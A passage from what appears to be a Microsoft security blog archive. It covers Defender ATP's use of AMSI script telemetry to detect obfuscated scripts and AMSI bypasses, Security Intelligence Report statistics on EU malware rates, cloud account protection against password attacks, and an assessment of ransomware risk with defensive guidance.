With the instrumentation of AMSI signals added as part of the Windows 10 Fall Creators Update (version 1709), Windows Defender ATP machine learning algorithms can now make use of insight into the unobfuscated script content while continually referencing machine state changes associated with process activity. Weve also built a variety of script-based models that inspect the nature of executed scripts, such as the count of obfuscation layers, entropy, obfuscation features, ngrams, and specific API invocations, to name a few.

As AMSI peels off the obfuscation layers, Windows Defender ATP benefits from growing visibility and insight into API calls, variable names, and patterns in the general structure of malicious scripts. And while AMSI data helps improve human expert knowledge and their ability to train learning systems, our deep neural networks automatically learn features that are often hidden from human analysts.

Machine-learning detections of JavaScript and PowerShell scripts

Figure 8. Machine learning detections of JavaScript and PowerShell scripts

While these new script-based machine learning models augment our expert classifiers, we also correlate new results with other behavioral information. For example, Windows Defender ATP correlates the detection of suspicious script contents from AMSI with other proximate behaviors, such as network connections. This contextual information is provided to SecOps personnel, helping them respond to incidents efficiently.

Machine learning combines VBScript content from AMSI and tracked network activity

Figure 9. Machine learning combines VBScript content from AMSI and tracked network activity

Detection of AMSI bypass attempts

With AMSI providing powerful insight into malicious script activity, attacks are more likely to incorporate AMSI bypass mechanisms that we group into three categories:

  • Bypasses that are part of the script content and can be inspected and alerted on
  • Tampering with the AMSI sensor infrastructure, which might involve the replacement of system files or manipulation of the load order of relevant DLLs
  • Patching of AMSI instrumentation in memory

The Windows Defender ATP research team proactively develops anti-tampering mechanisms for all our sensors. We have devised heuristic alerts for possible manipulation of our optics, designing these alerts so that they are triggered in the cloud before the bypass can suppress them.

During actual attacks involving CVE-2017-8759, Windows Defender ATP not only detected malicious post-exploitation scripting activity but also detected attempts to bypass AMSI using code similar to one identified by Matt Graeber.

Windows Defender ATP alert based on AMSI bypass pattern

Figure 10. Windows Defender ATP alert based on AMSI bypass pattern

AMSI itself captured the following bypass code for analysis in the Windows Defender ATP cloud.

AMSI bypass code sent to the cloud for analysis

Figure 11. AMSI bypass code sent to the cloud for analysis

Conclusion: Windows Defender ATP machine learning and AMSI provide revolutionary defense against highly evasive script-based attacks

Provided as an open interface on Windows 10, Antimalware Scan Interface delivers powerful optics into malicious activity hidden in encrypted and obfuscated scripts that are oftentimes never written to disk. Such evasive use of scripts is becoming commonplace and is being employed by both highly skilled activity groups and authors of commodity malware.

AMSI captures malicious script behavior by looking at script content as it is interpreted, without having to check physical files or being hindered by obfuscation, encryption, or polymorphism. At the endpoint, AMSI benefits local scanners, providing the necessary optics so that even obfuscated and encrypted scripts can be inspected for malicious content. Windows Defender Antivirus, specifically, utilizes AMSI to dynamically inspect and block scripts responsible for dropping all kinds of malicious payloads, including ransomware and banking trojans.

With Windows 10 Fall Creators Update (1709), newly added script runtime instrumentation provides unparalleled visibility into script behaviors despite obfuscation. Windows Defender Antivirus uses this treasure trove of behavioral information about malicious scripts to deliver pre-breach protection at runtime. To deliver post-breach defense, Windows Defender ATP uses advanced machine learning systems to draw deeper insight from this data.

Apart from looking at specific activities and patterns of activities, new machine learning algorithms in Windows Defender ATP look at script obfuscation layers, API invocation patterns, and other features that can be used to efficiently identify malicious scripts heuristically. Windows Defender ATP also correlates script-based indicators with other proximate activities, so it can deliver even richer contextual information about suspected breaches.

To benefit from the new script runtime instrumentation and other powerful security enhancements like Windows Defender Exploit Guard, customers are encourage to install Windows 10 Fall Creators Update.

Read the The Total Economic Impact of Microsoft Windows Defender Advanced Threat Protection from Forrester to understand the significant cost savings and business benefits enabled by Windows Defender ATP. To directly experience how Windows Defender ATP can help your enterprise detect, investigate, and respond to advance attacks, sign up for a free trial.

 

Stefan Sellmer, Windows Defender ATP Research

with

Shay Kels, Windows Defender ATP Research

Karthik Selvaraj, Windows Defender Research

 

Additional readings

 


Talk to us

Questions, concerns, or insights on this story? Join discussions at the Microsoft community and Windows Defender Security Intelligence.

Follow us on Twitter @WDSecurity and Facebook Windows Defender Security Intelligence.

 

Microsoft Security Intelligence Report Volume 21 is now available

The latest volume of the Microsoft Security Intelligence Report is now available for free download at www.microsoft.com/sir.

This new volume of the report includes threat data from the first half of 2016 as well as longer term trend data on industry vulnerabilities, exploits, malware, and malicious websites. The report also provides specific threat data for over 100 countries/regions.

Our Featured Intelligence content for this volume of the report includes three deep dive sections:

Protecting cloud infrastructure; detecting and mitigating threats using Azure Security Center:
As organizations move workloads to cloud-based services it is important that security teams keep abreast of changes in their threat posture. New threats can be encountered when adopting solutions that are fully cloud based, or when connecting on-premises environments to cloud services. This section of the report details common threats that organizations may encounter, and explains how security teams can use Azure Security Center to protect, detect, and respond to security threats against Azure cloud-based resources.

PROMETHIUM and NEODYMIUM: parallel zero-day attacks targeting individuals in Europe:
Microsoft proactively monitors the threat landscape for emerging threats, including observing the activities of targeted activity groups. The new report chronicles two activity groups, code-named PROMETHIUM and NEODYMIUM, both of which target individuals in a specific area of Europe. Both attack groups launched attack campaigns in May 2016 using the same zero-day exploit to seek information about specific individuals. Microsoft is sharing information about these groups to raise awareness of their activities, and to help individuals and organizations implement existing mitigation options that significantly reduce risk from these attack groups and other similar groups.

Ten years of exploits: a long-term study of exploitation of vulnerabilities in Microsoft software:
Microsoft researchers conducted a study of security vulnerabilities and the exploitation of the most severe vulnerabilities in Microsoft software over a 10-year period ending in 2015. In the past five years vulnerability disclosures have increased across the entire industry. However, the number of remote code execution (RCE) and elevation of privilege (EOP) vulnerabilities in Microsoft software has declined significantly. The results of the study suggest that while the risk posed by vulnerabilities appeared to increase in recent years, the actualized risk of exploited vulnerabilities in Microsoft software has steadily declined.

There is a lot of other new data in this report that I hope you’ll find useful.

You can download Volume 21 of the Microsoft Security Intelligence Report at www.microsoft.com/sir.

Ken Malcolmson
Executive Security Advisor, Microsoft Enterprise Cybersecurity Group

What’s Been Happening in the Threat Landscape in the European Union

June 14th, 2016 No comments

Recently, I had the opportunity to visit customers in several countries in the European Union (EU). The threat landscape in the EU has been changing rapidly, and in some unpredictable ways. I thought it was time to share some new data and insights based on data from the latest volume of the Microsoft Security Intelligence Report.

I have written about the threat landscape in the EU many times in the past. If you are interested in reading some of these previously published articles, here’s a partial list:

The Latest Picture of the Threat Landscape in the European Union – part 1
The Latest Picture of the Threat Landscape in the European Union – part 2
The Latest Picture of the Threat Landscape in the European Union – part 3
Ransomware is on the Rise, Especially in Europe
The Threat Landscape in the European Union at RSA Conference Europe 2013
European Union check-up: Locations with Lowest Infection Rates in the EU and What We Can Learn From Them
European Union Check-Up: Malicious Websites Hosted in the EU
European Union check-up: Romania still tops the list of most infected in the EU
Cyber-Threats in the European Union: First Half 2012
Cyber-Threats in the European Union
The Threat Landscape Shifts Significantly in the European Union – Part 1
The Threat Landscape Shifts Significantly in the European Union – Part 2
The Threat Landscape Shifts Significantly in the European Union – Part 3

Let’s start by looking at the locations in the EU with the lowest and highest malware encounter rates (ER). ER is the percentage of computers running Microsoft real-time security software that report detecting malware or unwanted software during a given period of time. The worldwide average ER in the fourth quarter of 2015 was 20.8%. As Figure 1 illustrates, the “usual suspects” have the lowest ERs in the EU including Finland (8.6%), Sweden (11.4%), and Denmark (11.7%).

Figure 1: Locations in the EU with the lowest encounter rates in the fourth quarter of 2015 (4Q15)
061416_01

Figure 2 shows us that the locations with the highest ERs in the EU include Romania (31.3%), Bulgaria (29.8%), and Croatia (27.5%). As high as the ERs for these locations were in the fourth quarter of 2015, they were significantly lower than the countries/regions with the highest ERs in the world during the same period. These locations include Pakistan (63.0%), Indonesia (60.6%), the Palestinian Territories (57.3%), and Bangladesh (57.2%).

Figure 2: Locations in the EU with the highest encounter rates in the fourth quarter of 2015 (4Q15)
061416_02

You might have noticed the upward ER trend in figures 1 and 2. This is upward trend even more pronounced when looking at the malware infection rates in the region as seen in figures 3 and 4; these are systems that encountered malware and were successfully infected, a measure called computers cleaned per mille (CCM). The worldwide average infection rate in the fourth quarter of 2015 was 16.9 systems infected with malware for every 1,000 scanned by the Malicious Software Removal Tool (MSRT) or 1.69% of the 600 to 700 million systems the MSRT executes on each month. The worldwide infection rate almost tripled from the same period a year earlier. The average infection rate for the 28 countries/regions in the EU during the same period was a CCM of 21.1 or 2.1%. This is a CCM increase of 15.5 from a year earlier.

Figure 3: Locations in the EU with the lowest malware infection rates (CCM) in the fourth quarter of 2015 (4Q15)
061416_03

Even locations with consistently low malware infection rates saw large increases between the third and fourth quarters of 2015. As seen in Figure 3, Finland’s CCM, for example, nearly quadrupled in the fourth quarter. Figure 4 illustrates the locations with the highest infection rates in the EU, which include Romania (36.4), Croatia (35.2), Spain (34.0), while the worldwide average was 16.9. For context, the locations with the highest CCMs in the world during the same period include Mongolia (93.3), Libya (85.3), the Palestinian Territories (80.0).

Figure 4: Locations in the EU with the highest malware infection rates (CCM) in the fourth quarter of 2015 (4Q15)
061416_04

You are probably wondering what caused such a rapid increase in infection rates in the EU and worldwide? It would be easy to believe that the threat landscape just got a whole lot worse, but that’s not really the case. Every month, the Microsoft Malware Protection Center typically adds detection capabilities to the MSRT for one or more new families of malware that researchers believe are globally prevalent. Then the MSRT executes on 600 to 700 million systems worldwide. If researchers were correct about the families they added to the MSRT, the MSRT will clean the newly added threats from systems infected with those threats around the world.

Sometimes, like in the fourth quarter of 2015, one of the threats they added detection for was really prevalent and gets cleaned from lots of systems. The worldwide infection rate increased 175.9 percent in the final quarter of 2015, from a CCM of 6.1 in the third quarter to 16.9 in fourth quarter. Almost all of this increase was due to Win32/Diplugem, a browser modifier that shows extra advertisements as the user browses the web. The CCM for Diplugem alone in 4Q15 was 11.7, nine times as high as the CCM for the next most prevalent family, Win32/Gamarue.

As seen in Figure 5, detection for Win32/Diplugem, was added to the MSRT in the fourth quarter and was removed from more computers in the EU in 4Q15 than any other family by a significant margin. In the EU, Win32/Diplugem was removed from 15.4 computers for every 1,000 computers the MSRT executed on in the fourth quarter, or 1.54% of systems.

Figure 5: The top 10 families of threats cleaned by the MSRT in the EU during the fourth quarter of 2015
061416_05

One other threat family I will call your attention to is Win32/CompromisedCert. This is the third threat family listed in the top threats cleaned in the EU, in Figure 5. This is a detection for the Superfish VisualDiscovery advertising program that was preinstalled on some Lenovo laptops sold in 2014 and 2015. It installs a compromised trusted root certificate on the computer, which can be used to conduct man-in-the-middle attacks on the computer. This threat was cleaned consistently on systems in the EU throughout 2015. I was surprised to see Win32/CompromisedCert on the top 4 list of threats cleaned in locations like the UK, Germany and the Netherlands.

Almost everyone I talked to during my recent trip to some locations in the EU, was concerned about Ransomware. I wrote an article on Ransomware recently that provides some good context on this type of threat: Ransomware: Understanding the Risk. The data for the last half of 2015 suggests there was a slight increase in the ER for ransomware (0.26 percent in 3Q15, 0.40 percent in 4Q15), but it’s still a fraction of 1 percent and much lower than almost every other category of malware.

In the EU, 18 of the 28 countries had Ransomware encounter rates above the worldwide average as Figure 6 illustrates. Systems in Portugal and Italy encountered Ransomware more than any other locations in the EU. This isn’t surprising – I wrote that Ransomware was on the rise, especially in Europe, years ago. The good news is that Ransomware is one of the least encountered threats in the EU as Figure 7 illustrates.

Figure 6: Ransomware Encounter Rates in the EU during the fourth quarter of 2015
061416_06

Figure 7 illustrates shows us which locations in the EU have the highest and lowest encounter rates across different threat categories. The numbers in red are the highest ERs for that threat category while the numbers in pink are above the worldwide average. The numbers that aren’t shaded are the lowest ERs for that threat category and are below the worldwide average. With this data, I find it especially noteworthy that every location in the EU, with the exception of Finland, had encounter rates for Exploits above the worldwide average, in many cases two or three times higher. A contributing factor is that the Angler exploit kit (JS/Axpergle) was one of the most encountered threats in the EU in 2015, being encountered by more than 1% of systems in the fourth quarter of 2015.

Figure 7: Encounter Rates for Threat Categories in the EU during the fourth quarter of 2015
061416_07

From drive-by download URL data provided by Bing, Slovakia and Cyprus hosted the highest number of drive-by download pages per 1,000 URLs in the EU, as seen in Figure 8.

Figure 8: Drive-by download pages indexed by Bing at the end of the fourth quarter of 2015, per 1,000 URLs in each country/region
061416_08

Guidance to Protect Your Organization

Based on the specific threats we see in the EU, let me give you some guidance to help protect your organization.

  • Security Updates: given most locations in the EU have above average Exploit encounter rates and that the Angler exploit kit (JS/Axpergle) is a top threat encountered in the region, its critical for organizations to keep all software up to date with the latest security updates. This isn’t just your Microsoft software, it includes software from Adobe, Oracle, and every other vendor your organization procures software from. If you have vendors that don’t provide you with security updates, your organization isn’t getting its money’s worth. Data from the new Security Intelligence Report on industry vulnerability disclosures, shows us that there were 6,384 vulnerabilities disclosed across the industry in 2015 alone, which is a typical year. Organizations need to patch all of those vulnerabilities in their environment to protect themselves from the high level of exploit activity in the EU. Demand security updates from all of your vendors.
  • Up-to-date Anti-Malware Software: don’t let security experts convince you that anti-virus software is a waste of time. No software or hardware can protect your organization from all current and future threats. But running up-to-date anti-malware software from a trusted vendor will protect your organization from millions of current and future threats. We know from many studies over the years, using data from hundreds of millions of systems around the world, systems that run current anti-malware solutions have significantly lower malware infection rates than those that don’t (as seen in Figure 9).Figure 9: Infection rates for protected and unprotected computers in 2015
    061416_09
  • Ransomware: if you are trying to evaluate the risk to your organization that Ransomware poses, keep calm and stay vigilant; this is a low probability, high impact threat where there are numerous mitigations available. The best mitigation is maintaining current offline backups for critical data. Check out these two articles: Ransomware: Understanding the Risk, How to Deal with Ransomware.
  • Malicious Websites: one of the best ways organizations can protect their users from malicious and compromised websites is by mandating the use of web browsers with appropriate protection features built in and by promoting safe browsing practices. For in-depth guidance, see this article.
  • Modern Operating Systems and Browsers: the latest data clearly shows us that using a modern operating system, like Windows 10, and a modern browser, like Microsoft Edge, provides significant protection against the type of modern day threats I discussed in this article. If you haven’t done so yet, evaluate these newer products versus the older products your organization might be using. On older operating systems, like Windows 7, use the Enhanced Mitigation Experience Toolkit (EMET), if possible, to minimize exploitation of vulnerabilities in the software in your environment. See technet.microsoft.com/security/jj653751 for more information.
  • Regional Security Experts’ Advice: there are six things that security experts in the consistently least infected countries/regions in the world (like Finland) tell us helps them. Here’s the list:
    • Strong public – private partnerships that enable proactive and response capabilities
    • CERTs, ISPs and others actively monitoring for threats in the region enable rapid response to emerging threats
    • An IT culture where system administrators respond rapidly to reports of system infections or abuse is helpful
    • Enforcement policies and active remediation of threats via quarantining infected systems on networks in the region is effective
    • Regional education campaigns and media attention that help improve the public’s awareness of security issues can pay dividends
    • Low software piracy rates and widespread usage of Windows Update/Microsoft Update has helped keep infection rates relatively low

This was a long article, but I hope it was worth the time you spent reading it. You can get more details on every country/region in the EU and almost a hundred more locations, by visiting http://microsoft.com/sir and clicking on Regional Threat Assessment.

Tim Rains
Director, Security

Protecting Identities in the Cloud: Mitigating Password Attacks

May 5th, 2016 No comments

We just released a new volume of the Microsoft Security Intelligence Report. Included in the report, for the first time, is security data from the Microsoft cloud that reveals how we are leveraging an intelligent security graph to inform how we protect endpoints, better detect attacks and accelerate our response, to help protect our customers.

In November we outlined Microsoft’s new approach to how we Protect, Detect and Respond to security threats. We have been evolving our ability to get real-time insights and predictive intelligence across our network so we can stay a step ahead of the threats and protect customers.

The challenge is to correlate our security data with our threat intelligence data. To do this, we collect trillions of signals from billions of sources to build an intelligent security graph that can learn from one area and apply across the Microsoft platform. The intelligent security graph is powered by inputs we receive across our endpoints, consumer services, commercial services and on-premises technologies.

The new Security Intelligence Report contains many insights from this data and analysis. Here are some examples:

  • From a sensor network made up of hundreds of millions of systems running Microsoft anti-malware software, the data shows us that:
    • The number of systems that encountered malware in 2015 increased in the second half of the year. The worldwide encounter rate increased to 20.5% by the end of 2015, an increase of 5.5% from six months earlier.
    • The locations with the highest encounter rates were Pakistan, Indonesia, the Palestinian territories, Bangladesh, and Nepal which all had encounter rates above 50%.
    • Exploit kits accounted for four of the 10 most commonly encountered exploits during the second half of 2015. The Angler exploit kit was the most commonly encountered exploit kit family.
    • Although ransomware had relatively low encounter rates (worldwide ER for ransomware in the first quarter of 2015 was 0.35 percent and 0.16 percent in the second quarter), its use in ransomware-as-a-service kits and targeted attacks is increasing.
  • SmartScreen Filter is a feature in Internet Explorer and Microsoft Edge that offers users protection against phishing sites and sites that host malware. Based on phishing data from the SmartScreen:
    • Phishing sites that targeted online services received the largest share of impressions during the period, and accounted for the largest number of active phishing URLs
    • Sites that targeted financial institutions accounted for the largest number of active phishing attacks during the period

As I mentioned we’ve published cloud service security data in this Security Intelligence Report, for the first time. Let me share some of that data with you and why we are excited about how the cloud is improving the insights from our intelligent security graph.

Mitigating Password Attacks

The massive scale of Microsoft’s cloud enables us to gather an enormous amount of intelligence on malicious behavior, which in turn allows us to prevent the compromise of Microsoft Accounts and Azure Active Directory accounts, and block the use of leaked or stolen credentials.

Azure Active Directory provides single sign-on to thousands of cloud (SaaS) apps such as Office 365, Workday, Box, Google Apps and more, and access to web apps organizations run on-premises, and Microsoft Accounts are used by consumers to sign into services like Bing, Outlook.com, OneDrive, Skype, and Xbox LIVE.
The scale of these services provides tremendous insight into attackers’ efforts to compromise the user accounts of consumers and enterprises.
  1. At the end of 2015, Azure Active Directory was being used by 8.24 million tenants with over 550 million users.
  2. Azure Active Directory averaged over 1.3 billion requests per day.
  3. Every day, Microsoft processed over 13 billion logins from hundreds of millions of Microsoft Account users.

To prevent and mitigate attacks on the consumers and organizations using these services, we use a multi-layered system of protection mechanisms. The keystone of these protection systems is machine learning. Every day, our machine learning systems process more than 10 terabytes of data, including information on over 13 billion logins from hundreds of millions of Microsoft Account users.

We combine this with other protection algorithms and data feeds from:

  • The Microsoft Digital Crimes Unit
  • The Microsoft Security Response Center
  • Phishing attack data from Outlook.com and Exchange Online
  • Information acquired by partnering with academia, law enforcement, security researchers, and industry partners around the world

All this data helps us create a comprehensive protection system that helps keep our customers’ accounts safe. The system deflects tens of thousands of location-based attacks per day, and automatically blocks tens of thousands of requests each day that use credentials that have likely been stolen or leaked. Microsoft Accounts that are determined to be compromised are automatically entered into an account recovery process that allows only the rightful owner to regain sole access to the account.

Multiple algorithms look at a wide range of data produced by our systems working in real-time to stop attacks before they are successful, and, retroactively, to swiftly remediate accounts for whom an attack worked and remove access from a bad actor. For example, we also use tools such as incorrect password lockout and location-based blocking.

The Advantages of Machine Learning

Microsoft’s machine learning systems use various data points to determine when an account login attempt, even with a valid password, is likely fraudulent.

For Microsoft Accounts, these login attempts are blocked until a second factor of authentication is provided. For Azure Active Directory, Identity Protection allows administrators to create policies that do the same, requesting MFA or outright blocking the attempt based on the risk score of the login.

One of the factors the machine learning system uses to block login attempts is whether the location of the login attempt is a familiar location to the legitimate user.

New Threat Intelligence Provides Details on Attacks
Here is some the new data published we in this Security Intelligence Report:

  1. Compromised login attempts were blocked from unfamiliar locations nearly three quarters of the time.
  2. Attackers were located in different parts of the world:
    • 49% in Asia
    • 20% in South America
    • 14% in Europe
    • 13% in North America
    • 4% in Africa

Understanding where attacks are originating from, allows us to recognize attack patterns which we can then use to protect other systems and customers.

From all this data gathering and analysis, each day Microsoft’s account protection systems automatically detect and prevent more than 10 million attacks, from tens of thousands of locations, including millions of attacks where the attacker has valid credentials. That’s over 4 billion attacks prevented last year alone.

Very few organizations can access this much high quality data, aggregate it, and analyze it, every day, on-premises, and use it to make timely security decisions. Through our machine learning capabilities, the Microsoft cloud protects customers in a highly sophisticated way, faster than most organizations could do on-premises.

Guidance

In every Security Intelligence Report, we provide some guidance that helps protect people and organizations. There are a few things people can do to protect their accounts and devices from password based attacks:

  • The security of your account is particularly important if your username is an email address, because other services may rely on your email address to verify your identity. If an attacker takes over your account, they may be able to take over your other accounts too (like banking and online shopping) by resetting your passwords by email.
  • Tips for creating a strong and unique password:
    • Don’t use a password that is the same or similar to one you use on any other website. A cybercriminal who can break into that website can steal your password from it and use it to steal your account.
    • Don’t use a single word (e.g. “princess”) or a commonly-used phrase (e.g. “Iloveyou”).
    • Do make your password hard to guess even by those who know a lot about you (such as the names and birthdays of your friends and family, your favorite bands, and phrases you like to use).
  • Two-step verification boosts account security by making it more difficult for hackers to sign in—even if they know or guess your password.
  • If you turn on two-step verification and then try to sign in on a device we don’t recognize, we’ll ask you for two things:
    • Your password.
    • An extra security code.
    • We can send a new security code to your phone or your alternate email address, or you can get one through an authenticator app on your smartphone.
  • If your organization hasn’t started leveraging the cloud because you don’t think you can get the visibility or control you need, it’s time to re-evaluate it – the scale, and the threat intelligence and new security capabilities it enables, are likely going to provide higher ROI than you can get on-premises.
  • Organizations should evaluate how the cloud will help them evolve to a “protect, detect, respond” security strategy. Evaluate Azure Active Directory Identity Protection, which is in preview right now.

The new Security Intelligence Report is available at www.microsoft.com/sir.

Tim Rains
Director, Security

Microsoft Security Intelligence Report Volume 20 is now available

May 5th, 2016 No comments

The latest volume of the Microsoft Security Intelligence Report (SIR) is now available for free download at www.microsoft.com/sir.

We’ve been publishing threat intelligence reports for our customers, partners and the industry for 10 years now. During that time, we’ve published over 12,500 pages of threat intelligence, 100+ blog posts, many videos, and delivered thousands of customer briefings all over the world.

This new volume of the report includes threat data from the second half of 2015 as well as longer term trend data on industry vulnerabilities, exploits, malware, and malicious websites. The report also provides deep dive threat data for over 100 countries/regions.

There are a couple of new sections in this volume of the SIR that I’m excited to share.

First, the report includes a section called “PLATINUM: Targeted attacks in South and Southeast Asia.” This section provides details on a newly discovered determined adversary group, which Microsoft has code-named PLATINUM. This group has conducted several cyber espionage campaigns since 2009, focusing on targets associated with governments and related organizations in southeast Asia. This information can help you understand mitigations that can significantly reduce the risks that organizations face from such groups.

The other section I’m excited about is called “Protecting Identities in the Cloud: Mitigating Password Attacks.” This section of the report focuses on some of the things that Microsoft does to prevent account compromise inside our cloud services. This is the first time we’ve published data like this in the SIR.

There is a lot of other new data in this report that I hope you’ll find useful.

You can download Volume 20 of the Microsoft Security Intelligence Report at www.microsoft.com/sir.

Tim Rains
Director, Security

Ransomware: Understanding the Risk

April 22nd, 2016 No comments

Ransomware is a type of malware that holds computers or files for ransom by encrypting files or locking the desktop or browser on systems that are infected with it, then demanding a ransom in order to regain access. Criminals have used high pressure techniques to get victims to pay the ransom, such as:

  • Make encrypted data unrecoverable after a certain period of time
  • Threaten to post captured (potentially sensitive) data publicly
  • Use fear by claiming to be law enforcement and threaten prosecution
  • Increase the ransom payment amount as time goes on
  • Render the machine unbootable when it overwrites the Master Boot Record and encrypts physical sectors on disk
  • Threaten to erase all data and render all enterprise computers inoperable

Figure 1: An example of a ransomware ransom demand
042216_01

There is heightened concern across the industry about ransomware because of some high profile cases that illustrate ransomware isn’t just a threat for consumers to worry about, as it is being used in attacks on enterprises as well.

Although we know attackers that leverage ransomware are motivated by profit, the underlying reasons they have attacked specific organizations or industries are not as straight forward. Some attackers might very well be targeting specific industries with ransomware attacks. Other attackers might simply be leveraging their capabilities; i.e. they have developed the capability to exploit specific vulnerabilities in specific platforms or specific line-of-business applications that happen to be primarily used in, or get heavy use by, specific industries.

Ransomware is a topic that I have written about in the past (Ransomware: Ways to Protect Yourself & Your Business, Ransomware is on the Rise, Especially in Europe) and that we have covered extensively in some volumes of the Microsoft Security Intelligence Report. The Microsoft Malware Protection Center has provided extensive information about this category of threats (Ransomware, No mas, Samas: What’s in this ransomware’s modus operandi?, The three heads of the Cerberus-like Cerber ransomware, Locky malware, lucky to avoid it, MSRT October 2015: Tescrypt, MSRT September 2015: Teerac, MSRT July 2015: Crowti, Emerging ransomware: Troldesh, Your Browser is (not) Locked, etc.)

Given the heightened concern in the industry, I thought it was time to examine if the risk associated with this threat category has been increasing. This will help CISOs, security teams, and risk managers understand if they should prioritize this risk differently now than they have in the past. As always, risk is the combination of probability and impact.
042216_02

Let me start by providing some data and insights that will help organizations understand the probability component associated with the risk of ransomware. Using data from the Microsoft Security Intelligence Report, which includes data based on telemetry from hundreds of millions of systems around the world, we can see that ransomware has been encountered worldwide much less frequently than almost all other types of malware. Figure 2 illustrates the encounter rates for malware categories for each quarter ending in the second quarter of 2015. The encounter rate (ER) is the percentage of computers running Microsoft real-time security software that report detecting malware or potentially unwanted software during a quarter. Most of these encounters are from systems running Microsoft Security Essentials or Windows Defender reporting that they blocked malware from installing on them.

Figure 2: Encounter rates for significant malware categories, third quarter of 2014 (3Q14) – second quarter of 2015 (2Q15)
042216_03

The worldwide ER for ransomware in the first quarter of 2015 (1Q15) was 0.35 percent and 0.16 percent in the second quarter (2Q15) as seen in Figure 2. While the ER for Trojans was 3.92 percent and 4.45 percent in 1Q15 and 2Q15 respectively. That means the ER for Trojans was 11 times higher than the ransomware ER in 1Q15 and 28 times higher in 2Q15. More recent data for the last half of 2015 suggests there was a slight increase in the ER for ransomware (0.26 percent in 3Q15, 0.40 percent in 4Q15), but it’s still a fraction of 1 percent and much lower than almost every other category of malware. The most recent data, from the last month (March 2016), suggests that the worldwide ER for ransomware was 0.2 percent, putting it almost on par with the ER for Trojan Downloaders & Droppers, but still lower than viruses (file infectors) and most other threat categories.

Although the global encounter rate is just a fraction of a percent, there are some countries/regions that have higher ransomware encounter rates. i.e. the probability of encountering ransomware is higher in some locations than others. For example, the ER in Mexico was 5 times higher at 0.8 percent during the same period. France and Canada had ransomware encounter rates 4.4 times higher than the worldwide average at 0.7 percent, while the United States, Russia and Turkey all had elevated ransomware encounter rates, 3.75 times higher than the worldwide average, at 0.6 percent.

The locations that had the highest ransomware ERs in the world in 2015 are listed in Figures 3 and 4. Portugal and Italy were among the locations with the highest ransomware ERs in both halves of 2015.

Figure 3 (left): The countries/regions with the highest ransomware encounter rates in the world in the first half of 2015; Figure 4 (right): The countries/regions with the highest ransomware encounter rates in the world in the second half of 2015
042216_04042216_05

Although the ransomware ER in the UAE, for example, in the first half of 2015 was the highest in the world, ransomware is still one of the least encountered categories of threats there as Figure 5 illustrates. A ransomware family does not appear in the top 10 list of threats in the UAE.

Figure 5: Malware encountered in the United Arab Emirates in the second quarter of 2015, by category
042216_06

The infection rate is typically a fraction of the ER because systems have to encounter malware before they can get infected. Data in several volumes of the Security Intelligence Report suggests that 70 percent to 80 percent of systems that run the MSRT also run up-to-date real time antivirus. This means most systems will be able to block the installation of known commodity ransomware before they can become infected. Thus ER is typically much greater than the actual infection rate.

The malware infection rate, called the Computers Cleaned per Mille (CCM), is measured by the number of computers cleaned for every 1,000 unique computers that run the Windows Malicious Software Removal Tool (MSRT). For example, if MSRT has 50,000 executions in a particular location in the first quarter of the year and removes infections from 200 computers, the CCM for that location in the first quarter of the year is 4.0 (200 ÷ 50,000 × 1,000).

Detection for new malware families are typically added to the MSRT every month. The MSRT cleans many of the most prevalent families of ransomware like Win32/Crowti, Ransom: Win32/Reveton, and Win32/Samas. Of these, Crowti had the highest CCM in the second half of 2015, 0.04 in 3Q15 and 0.01 in 4Q15. This means that for every 1,000 systems the MSRT executed on in the fourth quarter of 2015, 0.01 was cleaned of Crowti; that’s 1/1000 of a percent of the hundreds of millions of systems the MSRT executes on each month.

The ER data I outlined above suggests that ransomware represents a risk that has been lower probability relative to other types of malware in most parts of the world. But the rapid evolution of ransomware suggests that these numbers could rise in the future. Email (spam, spear-phishing, etc), social engineering using Word and Excel macros, drive-by download attacks, and removable storage devices (USB drives) are among the most common ways attackers have distributed ransomware. This has been evolving rapidly.

The ability for less-skilled attackers to mount ransomware campaigns has increased recently, due to the emergence of ransomware-as-a-service (RaaS) offerings on the darkweb. Sarento and Enrume are ransomware families that are examples of this approach. Ransomware is being increasingly paired with exploit kits, such as JS/Axpergle (a.k.a. Angler), and other malware to gain persistence in victims’ environments. More attackers using more distribution points has led to more enterprises encountering ransomware as figures 6 and 7 illustrate. Additionally, ransomware can be distributed to systems via other malware, i.e. existing infections, to increase attacker monetization of the assets they control.

When comparing these figures, notice how the ER for ransomware increased between the first and second halves of 2015 surpassing the ER of Password Stealers & Monitoring Tools. Also notice that the ER for ransomware on domain joined systems surpassed that of non-domain joined systems.

Figure 6: Malware and unwanted software encounter rates for domain-based and non-domain computers, in the first half of 2015, by category
042216_07

Figure 7: Malware and unwanted software encounter rates for domain-based and non-domain computers, in the second half of 2015, by category
042216_08

More sophisticated attackers that target enterprises try to encrypt as much of their target’s critical data as possible. To do this, they need to move beyond encrypting data on a single device. They use all the dirty tricks in their toolkits to get a foothold in an organization’s IT environment including exploiting unpatched vulnerabilities, taking advantage of misconfigured systems and weak passwords, and of course social engineering.
042216_09

The main entry points for these attacks are vulnerable Internet facing servers and user workstations. Once they have compromised a single system, they use tactics similar to “APT” style attacks to traverse the infrastructure looking for more data to encrypt. To do this, they will gather credentials on the initial point of entry, attempt to gain elevated privileges (e.g. domain administrator), use those credentials to map out the organization’s network, then move laterally to new hosts, gathering more credentials that will allow them to encrypt data on as many machines as possible. Attackers will also deny the victim organization access to their backups, if they can, to increase the motivation to pay the ransom.

Once attackers have access to data (.pdf, .xlsx, .docx, etc) they believe is valuable to the victim organization, they encrypt it. As ransomware has been evolving, more of this malware has been employing correctly implemented strong encryption algorithms (Advanced Encryption Standards (AES) for example), that prevents recovery without a valid decryption key or restoring the original files from backup. Without backups, the impact of this type of attack to a business could be severe; the loss of intellectual property, customer data, and financial records could have irreversible consequences on a business.

The Samas family (Ransom:MSIL/Samas) of ransomware is a great example of ransomware using some of these tactics.  The MMPC has published a great article on this family: No mas, Samas: What’s in this ransomware’s modus operandi?

Detection for Samas was added to the MSRT in April 2016. The infection rate (CCM) for Samas is virtually zero, as it has only been seen used in targeted attacks versus used in broad attacks as commodity ransomware.

Figure 8: Ransom:MSIL/Samas infection chain
042216_10

Ransomware has been evolving quickly. Last month (March 2016) the top 5 ransomware families encountered included Ransom:Win32/Tescrypt, Ransom:Win32/Locky, Ransom:Win32/Crowti, Ransom:JS/Brolo, Ransom:Win32/Teerac.

Although commodity ransomware has relatively low encounter rates and low infection rates, when determining the probability and impact in ransomware risk calculations it’s important to consider that ransomware is also being used as part of ransomware-as-a-service kits and by determined adversaries in targeted attacks.

